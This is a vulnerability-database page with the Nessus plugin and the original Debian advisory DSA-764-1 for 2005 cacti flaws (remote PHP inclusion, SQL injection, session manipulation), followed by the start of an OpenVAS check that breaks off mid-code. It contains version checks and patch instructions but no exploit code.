Debian DSA-764-1 : cacti - several vulnerabilities
2005-07-21T00:00:00
ID DEBIAN_DSA-764.NASL Type nessus Reporter This script is Copyright (C) 2005-2021 Tenable Network Security, Inc. Modified 2021-01-04T00:00:00
Description
Several vulnerabilities have been discovered in cacti, a round-robin database (RRD) tool that helps create graphs from database information. The Common Vulnerabilities and Exposures Project identifies the following problems :
CAN-2005-1524 Maciej Piotr Falkiewicz and an anonymous researcher discovered an input validation bug that allows an attacker to include arbitrary PHP code from remote sites which will allow the execution of arbitrary code on the server running cacti.
CAN-2005-1525
Due to missing input validation cacti allows a remote attacker to insert arbitrary SQL statements.
CAN-2005-1526
Maciej Piotr Falkiewicz discovered an input validation bug that allows an attacker to include arbitrary PHP code from remote sites which will allow the execution of arbitrary code on the server running cacti.
CAN-2005-2148
Stefan Esser discovered that the update for the above mentioned vulnerabilities does not perform proper input validation to protect against common attacks.
CAN-2005-2149
Stefan Esser discovered that the update for CAN-2005-1525 allows remote attackers to modify session information to gain privileges and disable the use of addslashes to protect against SQL injection.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Debian Security Advisory DSA-764. The text
# itself is copyright (C) Software in the Public Interest, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(19258);
script_version("1.24");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/04");
script_cve_id("CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526", "CVE-2005-2148", "CVE-2005-2149");
script_xref(name:"DSA", value:"764");
script_name(english:"Debian DSA-764-1 : cacti - several vulnerabilities");
script_summary(english:"Checks dpkg output for the updated package");
script_set_attribute(
attribute:"synopsis",
value:"The remote Debian host is missing a security-related update."
);
script_set_attribute(
attribute:"description",
value:
"Several vulnerabilities have been discovered in cacti, a round-robin
database (RRD) tool that helps create graphs from database
information. The Common Vulnerabilities and Exposures Project
identifies the following problems :
- CAN-2005-1524
Maciej Piotr Falkiewicz and an anonymous researcher
discovered an input validation bug that allows an
attacker to include arbitrary PHP code from remote sites
which will allow the execution of arbitrary code on the
server running cacti.
- CAN-2005-1525
Due to missing input validation cacti allows a remote
attacker to insert arbitrary SQL statements.
- CAN-2005-1526
Maciej Piotr Falkiewicz discovered an input validation
bug that allows an attacker to include arbitrary PHP
code from remote sites which will allow the execution of
arbitrary code on the server running cacti.
- CAN-2005-2148
Stefan Esser discovered that the update for the above
mentioned vulnerabilities does not perform proper input
validation to protect against common attacks.
- CAN-2005-2149
Stefan Esser discovered that the update for
CAN-2005-1525 allows remote attackers to modify session
information to gain privileges and disable the use of
addslashes to protect against SQL injection."
);
script_set_attribute(
attribute:"see_also",
value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=316590"
);
script_set_attribute(
attribute:"see_also",
value:"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=315703"
);
script_set_attribute(
attribute:"see_also",
value:"http://www.debian.org/security/2005/dsa-764"
);
script_set_attribute(
attribute:"solution",
value:
"Upgrade the cacti package.
For the old stable distribution (woody) these problems have been fixed
in version 0.6.7-2.5.
For the stable distribution (sarge) these problems have been fixed in
version 0.8.6c-7sarge2."
);
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_type", value:"local");
script_set_attribute(attribute:"cpe", value:"p-cpe:/a:debian:debian_linux:cacti");
script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.0");
script_set_attribute(attribute:"cpe", value:"cpe:/o:debian:debian_linux:3.1");
script_set_attribute(attribute:"patch_publication_date", value:"2005/07/21");
script_set_attribute(attribute:"plugin_publication_date", value:"2005/07/21");
script_set_attribute(attribute:"vuln_publication_date", value:"2005/06/22");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.");
script_family(english:"Debian Local Security Checks");
script_dependencies("ssh_get_info.nasl");
script_require_keys("Host/local_checks_enabled", "Host/Debian/release", "Host/Debian/dpkg-l");
exit(0);
}
include("audit.inc");
include("debian_package.inc");
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
if (!get_kb_item("Host/Debian/release")) audit(AUDIT_OS_NOT, "Debian");
if (!get_kb_item("Host/Debian/dpkg-l")) audit(AUDIT_PACKAGE_LIST_MISSING);
flag = 0;
if (deb_check(release:"3.0", prefix:"cacti", reference:"0.6.7-2.5")) flag++;
if (deb_check(release:"3.1", prefix:"cacti", reference:"0.8.6c-7sarge2")) flag++;
if (flag)
{
if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());
else security_hole(0);
exit(0);
}
else audit(AUDIT_HOST_NOT, "affected");
{"id": "DEBIAN_DSA-764.NASL", "type": "nessus", "bulletinFamily": "scanner", "title": "Debian DSA-764-1 : cacti - several vulnerabilities", "description": "Several vulnerabilities have been discovered in cacti, a round-robin database (RRD) tool that helps create graphs from database information. The Common Vulnerabilities and Exposures Project identifies the following problems :\n\n - CAN-2005-1524 Maciej Piotr Falkiewicz and an anonymous researcher discovered an input validation bug that allows an attacker to include arbitrary PHP code from remote sites which will allow the execution of arbitrary code on the server running cacti.\n\n - CAN-2005-1525\n\n Due to missing input validation cacti allows a remote attacker to insert arbitrary SQL statements.\n\n - CAN-2005-1526\n\n Maciej Piotr Falkiewicz discovered an input validation bug that allows an attacker to include arbitrary PHP code from remote sites which will allow the execution of arbitrary code on the server running cacti.\n\n - CAN-2005-2148\n\n Stefan Esser discovered that the update for the above mentioned vulnerabilities does not perform proper input validation to protect against common attacks.\n\n - CAN-2005-2149\n\n Stefan Esser discovered that the update for CAN-2005-1525 allows remote attackers to modify session information to gain privileges and disable the use of addslashes to protect against SQL injection.", "published": "2005-07-21T00:00:00", "modified": "2021-01-04T00:00:00", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": null, "vector": null}, "href": "https://www.tenable.com/plugins/nessus/19258", "reporter": "This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2148", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1526", "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=316590", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1525", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1524", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2149", "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=315703", "http://www.debian.org/security/2005/dsa-764"], "cvelist": ["CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526", "CVE-2005-2148", "CVE-2005-2149"], "immutableFields": [], "lastseen": "2021-08-19T13:16:55", "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526", "CVE-2005-2148", "CVE-2005-2149"]}, {"type": "debian", "idList": ["DEBIAN:DSA-764-1:8F475", "DEBIAN:DSA-764-1:F8FAD"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2005-1524", "DEBIANCVE:CVE-2005-1525", "DEBIANCVE:CVE-2005-1526", "DEBIANCVE:CVE-2005-2148", "DEBIANCVE:CVE-2005-2149"]}, {"type": "gentoo", "idList": ["GLSA-200506-20"]}, {"type": "nessus", "idList": ["CACTI_086E.NASL", "CACTI_086E_VCHECK.NASL", "CACTI_086F.NASL", "CACTI_086F_VCHECK.NASL", "GENTOO_GLSA-200506-20.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:54411", "OPENVAS:54972"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:8932", "SECURITYVULNS:DOC:8933", "SECURITYVULNS:DOC:8934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2005-1524", "UB:CVE-2005-1525", "UB:CVE-2005-1526", "UB:CVE-2005-2148", "UB:CVE-2005-2149"]}], "rev": 4}, "score": {"value": 8.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526", "CVE-2005-2148", "CVE-2005-2149"]}, {"type": "debian", "idList": ["DEBIAN:DSA-764-1:8F475"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2005-1524"]}, {"type": "nessus", "idList": ["CACTI_086E.NASL", "CACTI_086F.NASL", "GENTOO_GLSA-200506-20.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:8932"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2005-1524"]}]}, "exploitation": null, "vulnersScore": 8.9}, "pluginID": "19258", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-764. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(19258);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-1524\", \"CVE-2005-1525\", \"CVE-2005-1526\", \"CVE-2005-2148\", \"CVE-2005-2149\");\n script_xref(name:\"DSA\", value:\"764\");\n\n script_name(english:\"Debian DSA-764-1 : cacti - several vulnerabilities\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in cacti, a round-robin\ndatabase (RRD) tool that helps create graphs from database\ninformation. The Common Vulnerabilities and Exposures Project\nidentifies the following problems :\n\n - CAN-2005-1524\n Maciej Piotr Falkiewicz and an anonymous researcher\n discovered an input validation bug that allows an\n attacker to include arbitrary PHP code from remote sites\n which will allow the execution of arbitrary code on the\n server running cacti.\n\n - CAN-2005-1525\n\n Due to missing input validation cacti allows a remote\n attacker to insert arbitrary SQL statements.\n\n - CAN-2005-1526\n\n Maciej Piotr Falkiewicz discovered an input validation\n bug that allows an attacker to include arbitrary PHP\n code from remote sites which will allow the execution of\n arbitrary code on the server running cacti.\n\n - CAN-2005-2148\n\n Stefan Esser discovered that the update for the above\n mentioned vulnerabilities does not perform proper input\n validation to protect against common attacks.\n\n - CAN-2005-2149\n\n Stefan Esser discovered that the update for\n CAN-2005-1525 allows remote attackers to modify session\n information to gain privileges and disable the use of\n addslashes to protect against SQL injection.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=316590\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=315703\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-764\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the cacti package.\n\nFor the old stable distribution (woody) these problems have been fixed\nin version 0.6.7-2.5.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 0.8.6c-7sarge2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/07/21\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/06/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"cacti\", reference:\"0.6.7-2.5\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"cacti\", reference:\"0.8.6c-7sarge2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "naslFamily": "Debian Local Security Checks", "cpe": ["p-cpe:/a:debian:debian_linux:cacti", "cpe:/o:debian:debian_linux:3.0", "cpe:/o:debian:debian_linux:3.1"], "solution": "Upgrade the cacti package.\n\nFor the old stable distribution (woody) these problems have been fixed in version 0.6.7-2.5.\n\nFor the stable distribution (sarge) these problems have been fixed in version 0.8.6c-7sarge2.", "nessusSeverity": "Critical", "cvssScoreSource": "", "vpr": {"risk factor": "Medium", "score": "6.6"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2005-07-21T00:00:00", "vulnerabilityPublicationDate": "2005-06-22T00:00:00", "exploitableWith": [], "_state": {"dependencies": 1647589307, "score": 0}}
{"debian": [{"lastseen": "2021-10-22T03:43:44", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 764-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJuly 21st, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : cacti\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE IDs : CAN-2005-1524 CAN-2005-1525 CAN-2005-1526 CAN-2005-2148 CAN-2005-2149\nDebian Bug : 316590 315703\n\nSeveral vulnerabilities have been discovered in cacti, a round-robin\ndatabase (RRD) tool that helps create graphs from database\ninformation. The Common Vulnerabilities and Exposures Project\nidentifies the following problems:\n\nCAN-2005-1524\n\n Maciej Piotr Falkiewicz and an anonymous researcher discovered an\n input validation bug that allows an attacker to include arbitrary\n PHP code from remote sites which will allow the execution of\n arbitrary code on the server running cacti.\n\nCAN-2005-1525\n\n Due to mising input validation cacti allows a remote attacker to\n insert arbitrary SQL statements.\n\nCAN-2005-1526\n\n Maciej Piotr Falkiewicz discovered an input validation bug that\n allows an attacker to include arbitrary PHP code from remote sites\n which will allow the execution of arbitrary code on the server\n running cacti.\n\nCAN-2005-2148\n\n Stefan Esser discovered that the update for the abovely mentioned\n vulnerabilities does not perform proper input validation to\n protect against common attacks.\n\nCAN-2005-2149\n\n Stefan Esser discovered that the update for CAN-2005-1525 allows\n remote attackers to modify session information to gain privileges\n and disable the use of addslashes to protect against SQL\n injection.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 0.6.7-2.5.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 0.8.6c-7sarge2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 0.8.6e-1.\n\nWe recommend that you upgrade your cacti package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.6.7-2.5.dsc\n Size/MD5 checksum: 565 ca9cffd44ea6e8235005ce8e066fb88e\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.6.7-2.5.diff.gz\n Size/MD5 checksum: 25286 18aad674e7ef91dafb11af9a02c677d7\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.6.7.orig.tar.gz\n Size/MD5 checksum: 206608 b004ac1ca1dd18737f0fa685fe18737c\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.6.7-2.5_all.deb\n Size/MD5 checksum: 212418 ae47dc9aeb1820c5074fc39c5b6c84bc\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge2.dsc\n Size/MD5 checksum: 595 50f791f80662a02e982e82e4be7e59b5\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge2.diff.gz\n Size/MD5 checksum: 42575 a9959e2d720a6f7188c5713494b9eaaa\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c.orig.tar.gz\n Size/MD5 checksum: 1046586 b4130300f671e773ebea3b8f715912c1\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge2_all.deb\n Size/MD5 checksum: 1058544 2b5fe2ca0dc11a199c20f5bf7b3aa7ee\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2005-07-21T05:53:41", "type": "debian", "title": "[SECURITY] [DSA 764-1] New cacti packages fix several vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526", "CVE-2005-2148", "CVE-2005-2149"], "modified": "2005-07-21T05:53:41", "id": "DEBIAN:DSA-764-1:8F475", "href": "https://lists.debian.org/debian-security-announce/2005/msg00151.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-01T13:52:02", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 764-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nJuly 21st, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : cacti\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE IDs : CAN-2005-1524 CAN-2005-1525 CAN-2005-1526 CAN-2005-2148 CAN-2005-2149\nDebian Bug : 316590 315703\n\nSeveral vulnerabilities have been discovered in cacti, a round-robin\ndatabase (RRD) tool that helps create graphs from database\ninformation. The Common Vulnerabilities and Exposures Project\nidentifies the following problems:\n\nCAN-2005-1524\n\n Maciej Piotr Falkiewicz and an anonymous researcher discovered an\n input validation bug that allows an attacker to include arbitrary\n PHP code from remote sites which will allow the execution of\n arbitrary code on the server running cacti.\n\nCAN-2005-1525\n\n Due to mising input validation cacti allows a remote attacker to\n insert arbitrary SQL statements.\n\nCAN-2005-1526\n\n Maciej Piotr Falkiewicz discovered an input validation bug that\n allows an attacker to include arbitrary PHP code from remote sites\n which will allow the execution of arbitrary code on the server\n running cacti.\n\nCAN-2005-2148\n\n Stefan Esser discovered that the update for the abovely mentioned\n vulnerabilities does not perform proper input validation to\n protect against common attacks.\n\nCAN-2005-2149\n\n Stefan Esser discovered that the update for CAN-2005-1525 allows\n remote attackers to modify session information to gain privileges\n and disable the use of addslashes to protect against SQL\n injection.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 0.6.7-2.5.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 0.8.6c-7sarge2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 0.8.6e-1.\n\nWe recommend that you upgrade your cacti package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.6.7-2.5.dsc\n Size/MD5 checksum: 565 ca9cffd44ea6e8235005ce8e066fb88e\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.6.7-2.5.diff.gz\n Size/MD5 checksum: 25286 18aad674e7ef91dafb11af9a02c677d7\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.6.7.orig.tar.gz\n Size/MD5 checksum: 206608 b004ac1ca1dd18737f0fa685fe18737c\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.6.7-2.5_all.deb\n Size/MD5 checksum: 212418 ae47dc9aeb1820c5074fc39c5b6c84bc\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge2.dsc\n Size/MD5 checksum: 595 50f791f80662a02e982e82e4be7e59b5\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge2.diff.gz\n Size/MD5 checksum: 42575 a9959e2d720a6f7188c5713494b9eaaa\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c.orig.tar.gz\n Size/MD5 checksum: 1046586 b4130300f671e773ebea3b8f715912c1\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6c-7sarge2_all.deb\n Size/MD5 checksum: 1058544 2b5fe2ca0dc11a199c20f5bf7b3aa7ee\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>", "cvss3": {}, "published": "2005-07-21T05:53:41", "type": "debian", "title": "[SECURITY] [DSA 764-1] New cacti packages fix several vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2005-1524", "CVE-2005-1525", "CVE-2005-1526", "CVE-2005-2148", "CVE-2005-2149"], "modified": "2005-07-21T05:53:41", "id": "DEBIAN:DSA-764-1:F8FAD", "href": "https://lists.debian.org/debian-security-announce/2005/msg00151.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:50:12", "description": "The remote host is missing an update to cacti\nannounced via advisory DSA 764-1.\n\nSeveral vulnerabilities have been discovered in cacti, a round-robin\ndatabase (RRD) tool that helps create graphs from database\ninformation. The Common Vulnerabilities and Exposures Project\nidentifies the following problems:\n\nCVE-2005-1524\n\nMaciej Piotr Falkiewicz and an anonymous researcher discovered an\ninput validation bug that allows an attacker to include arbitrary\nPHP code from remote sites which will allow the execution of\narbitrary code on the server running cacti.\n\nCVE-2005-1525\n\nDue to mising input validation cacti allows a remote attacker to\ninsert arbitrary SQL statements.\n\nCVE-2005-1526\n\nMaciej Piotr Falkiewicz discovered an input validation bug that\nallows an attacker to include arbitrary PHP code from remote sites\nwhich will allow the execution of arbitrary code on the server\nrunning cacti.\n\nCVE-2005-2148\n\nStefan Esser discovered that the update for the abovely mentioned\nvulnerabilities does not perform proper input validation to\nprotect against common attacks.\n\nCVE-2005-2149\n\nStefan Esser discovered that the update for CVE-2005-1525 allows\nremote attackers to modify session information to gain privileges\nand disable the use of addslashes to protect against SQL\ninjection.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 0.6.7-2.5.", "cvss3": {}, "published": "2008-01-17T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 764-1 (cacti)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2005-1524", "CVE-2005-2149", "CVE-2005-1526", "CVE-2005-1525", "CVE-2005-2148"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:54411", "href": "http://plugins.openvas.org/nasl.php?oid=54411", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_764_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 764-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"For the stable distribution (sarge) these problems have been fixed in\nversion 0.8.6c-7sarge2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 0.8.6e-1.\n\nWe recommend that you upgrade your cacti package.\n\n https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20764-1\";\ntag_summary = \"The remote host is missing an update to cacti\nannounced via advisory DSA 764-1.\n\nSeveral vulnerabilities have been discovered in cacti, a round-robin\ndatabase (RRD) tool that helps create graphs from database\ninformation. The Common Vulnerabilities and Exposures Project\nidentifies the following problems:\n\nCVE-2005-1524\n\nMaciej Piotr Falkiewicz and an anonymous researcher discovered an\ninput validation bug that allows an attacker to include arbitrary\nPHP code from remote sites which will allow the execution of\narbitrary code on the server running cacti.\n\nCVE-2005-1525\n\nDue to mising input validation cacti allows a remote attacker to\ninsert arbitrary SQL statements.\n\nCVE-2005-1526\n\nMaciej Piotr Falkiewicz discovered an input validation bug that\nallows an attacker to include arbitrary PHP code from remote sites\nwhich will allow the execution of arbitrary code on the server\nrunning cacti.\n\nCVE-2005-2148\n\nStefan Esser discovered that the update for the abovely mentioned\nvulnerabilities does not perform proper input validation to\nprotect against common attacks.\n\nCVE-2005-2149\n\nStefan Esser discovered that the update for CVE-2005-1525 allows\nremote attackers to modify session information to gain privileges\nand disable the use of addslashes to protect against SQL\ninjection.\n\nFor the old stable distribution (woody) these problems have been fixed in\nversion 0.6.7-2.5.\";\n\n\nif(description)\n{\n script_id(54411);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:00:53 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2005-1524\", \"CVE-2005-1525\", \"CVE-2005-1526\", \"CVE-2005-2148\", \"CVE-2005-2149\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 764-1 (cacti)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"cacti\", ver:\"0.6.7-2.5\", rls:\"DEB3.0\")) != NULL) {\n report += 